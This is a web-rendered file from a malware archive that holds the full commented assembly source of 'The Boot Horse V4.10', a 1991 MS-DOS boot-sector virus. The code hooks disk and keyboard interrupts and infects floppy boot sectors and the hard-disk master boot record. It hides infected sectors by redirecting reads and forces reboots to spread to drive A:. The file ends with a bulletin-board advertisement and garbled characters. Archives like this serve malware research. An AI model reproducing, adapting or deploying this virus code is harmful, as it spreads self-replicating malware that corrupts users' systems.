MalwareSourceCode/MSDOS/B-Index/Virus.MSDOS.Unknown.boot410.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

258 lines
6.4 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

.radix 16
;******************************************
; *
; Code masters LTD. presents: *
; THE BOOT HORSE V4.10 *
; Finished on the 25.04.1991. *
; This is a boot virus,which does not *
; "cuts" memory.It places itself into the *
; second part of the interrupt table.If *
; it is resident you will not be able to *
; see the infected boot sector.If you *
; press CTRL-ALT-DEL & INT 13h had not *
; been changed,drive A: will be infected. *
; It shows you the message 'Brr...!' with *
; possibility 1/16. *
; Good luck! *
;******************************************
Start:
cld ;clear direction
xor ax,ax ;clear ax
mov bp,7c00 ;bp=7c00
mov ds,ax ;ds=ax=0
mov ss,ax ;ss=ax=0
mov sp,bp ;sp=bp=7c00
push ax ;save abs. addr. 0000:7c00 in stack for retf
push bp ;
xor di,di ;clear di
les bx,[di+9*4] ;load es:bx with current int 09h
mov word ptr [bp+old9h-Start],bx ;save it in a variable
mov word ptr [bp+old9h-Start+2],es
les bx,[di+13*4] ;load es:bx with current int 13h
mov word ptr [bp+old13h-Start],bx ;save it in a variable
mov word ptr [bp+old13h-Start+2],es
mov ax,0020 ;ax=20
mov [di+9*4],offset int9h-Start ;set int 09h
mov [di+9*4+2],ax
mov [di+13*4],offset int13h-Start ;set int 13h
mov [di+13*4+2],ax
mov es,ax ;es=ax=20
mov cx,0200 ;will move 512 bytes
mov si,bp ;si=bp=7c00
rep movsb ;move to 0020:0000 (vectors)
push es ;save es&ax for retf
mov ax,offset here-Start
push ax
retf ;go to 0020:here-Start
here:
test byte ptr [046C],0F ;show a message with possibility 1/16
jnz dont
mov si,offset msg-Start ;si point the message
mov cx,endmsg-msg ;strings to show
show_it:
db 26 ;ES:lodsb
lodsb ;load next char
mov ah,0e ;show char
xor bh,bh
int 10 ;do it
loop show_it ;show next
dont:
xor ah,ah ;initialize
int 13
mov es,cx ;es=cx=0
xchg ax,di
inc ax ;ax=201 =>read one sector.
mov bx,bp ;bx=bp=7c00
inc cx ;sector 1,cylinder 0.boot sector
mov dx,0080 ;dx=0080
cmp byte ptr cs:[ident-Start],dl ;if equal=>loading from hdd
je hard
push dx ;save dx
xor dl,dl ;drive A:
push ax ;save ax
int 13 ;read old bootsector from diskette
pop ax ;restore ax=201,read one sector
pop dx ;drive C:
mov bx,0600 ;bx=600
call ojoj ;read hdd's boot sector
jc goout ;no hdd installed
call check ;infected?
je goout ;yes ->out!
mov ax,0301 ;write one sector (save old)
push ax ;save ax
mov cx,0004 ;sector 4,cylinder 0
int 13 ;do it
mov byte ptr cs:[ident-Start],dl ;set identificator
push cs ;es=cs
pop es
mov si,07BE ;
mov di,01BE ; copy old partition
mov cx,64d ;
rep movsb ;
pop ax ;Write one sector,ax=301
xor bx,bx ;from addr ES:BX,bx=0 =>write virus
inc cx ;sector 1,cylinder 0.Boot sector.
hard:
int 13 ;do it
goout:
mov byte ptr cs:[ident-Start],0 ;set ident
retf ;go to 0000:7c00
int13h:
;save ax,ds
push ax
push ds
cmp ah,02 ;function read?
jne skip
cmp dl,80 ;drive A,B or C?
ja skip
cmp cx,0001 ;
jne notboot ;gonna read bootsector?
or dh,dh ;
jnz notboot ;
pop ds ;restore ax,ds
pop ax
call ojoj ;execute the task
jc all ;if error then no sence
pushf ;save some registers
push ax
push cx
push dx
call check ;infected?
jne notnow
mov ax,0201
inc cx ;if so then make some tricks
inc cx ;sector 3,cylinder 0
inc dh ;side 1
test dl,80 ;hdd?
je dolie ;if not then
inc cx ;sector 4,cylinder 0
dec dh ;side 0
dolie:
call ojoj ;read boot
notnow:
pop dx ;restore registers
pop cx
pop ax
popf
all:
; retf 0002 ;return to caller
db 0ca,2,0
notboot:
test dl,80 ;drive=C?
jne skip ;if so =>out!
xor ax,ax ;clear ax
mov ds,ax ;ds=ax=0
mov al,byte ptr [043F] ;this byte shows whether the motor is active
push dx ;save dx
inc dl ;adjust dl
test al,dl ;check if the motor is active.
pop dx ;restore dx
jnz skip ;if so =>leave
call infect ;infect it
skip:
pop ds ;restore flags,ax,ds
pop ax
do:
db 0EAh ;go to the original int 13h
old13h dd 000h ;JMP XXXX:XXXX
infect:
push bx ;save some registers
push cx
push dx
push es
mov ax,0201 ;will read 1 sector
mov cx,0001 ;sector 1,cylinder 0
xor dh,dh ;side 0
call ojoj ;do it
jc leave ;on error...
mov byte ptr cs:[count-Start],36d ;load counter
call check ;infected?
je leave ;leave if so.
mov ax,0301 ;write one sector
inc cx ;sector 3,cylinder 0
inc cx
inc dh ;side 1
push ax ;save ax
call ojoj ;do write (save old bootsector)
pop ax ;restore ax
jc leave ;write protected
push cs ;es=cs
pop es
xor bx,bx ;write virus
dec cx ;make cx=1
dec cx ;sector 1,cylinder 0
dec dh ;side 0
call ojoj ;that's it!
leave:
pop es ;restore registers
pop dx
pop cx
pop bx
ret ;return
ojoj:
pushf ;this calles the original int 13h
push cs
call do
ret
check:
cmp es:[bx],31FCh ;this checks the first 2 bytes
ret ;to understand if the disk is infected
int9h:
push ax ;the keybord interrupt.save AX
mov ah,02 ;check if ctrl-alt is pressed
int 16 ;
test al,00001100b ;if not =>exit
jz exit
in al,60 ;is del pressed?
cmp al,53
je cont ;if so...
exit:
pop ax ;restore ax
db 0EAh ;go to the old int 09h
old9h dd 000h ;JMP XXXX:XXXX
cont:
mov al,20 ;free interrupts
out 20,al ;do it
mov ax,0003 ;clear screen
int 10 ;do it
mov dx,03D8 ;chose video port
mov al,04 ;video flag
out dx,al ;no video
mov ax,0060 ;es=60
mov es,ax ;
xor bx,bx ;drive A
xor dl,dl ;bx=0
mov ds,bx ;dx=bx=0
mov byte ptr cs:[count-Start],18d ;load counter to 1 sec.
cli ;set int 1ch
mov [bx+1c*4],offset int1ch-Start
mov [bx+1c*4+2],cs
sti
cmp [bx+13*4],offset int13h-Start ;is int 13h changed?
jne reset ;if so reset computer
call infect ;infect disk in drive A
reset:
xor bx,bx
mov ds,bx ;don't count memory !
mov [bx+0472],1234
; JMP FFFF:0000 ;Reset
db 0ea,00,00,0ff,0ff
int1ch:
dec byte ptr cs:[count-Start] ;decrease counter
jz reset ;if zero then reset
iret ;otherwise continue
msg db 'Brr...!',7,0a,0dh, ;message
endmsg label word
ident db 0 ;0 for fdd,80 for hdd
count label byte
partition db 64d dup (?)
bootident dw 0AA55
endcode label word

;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;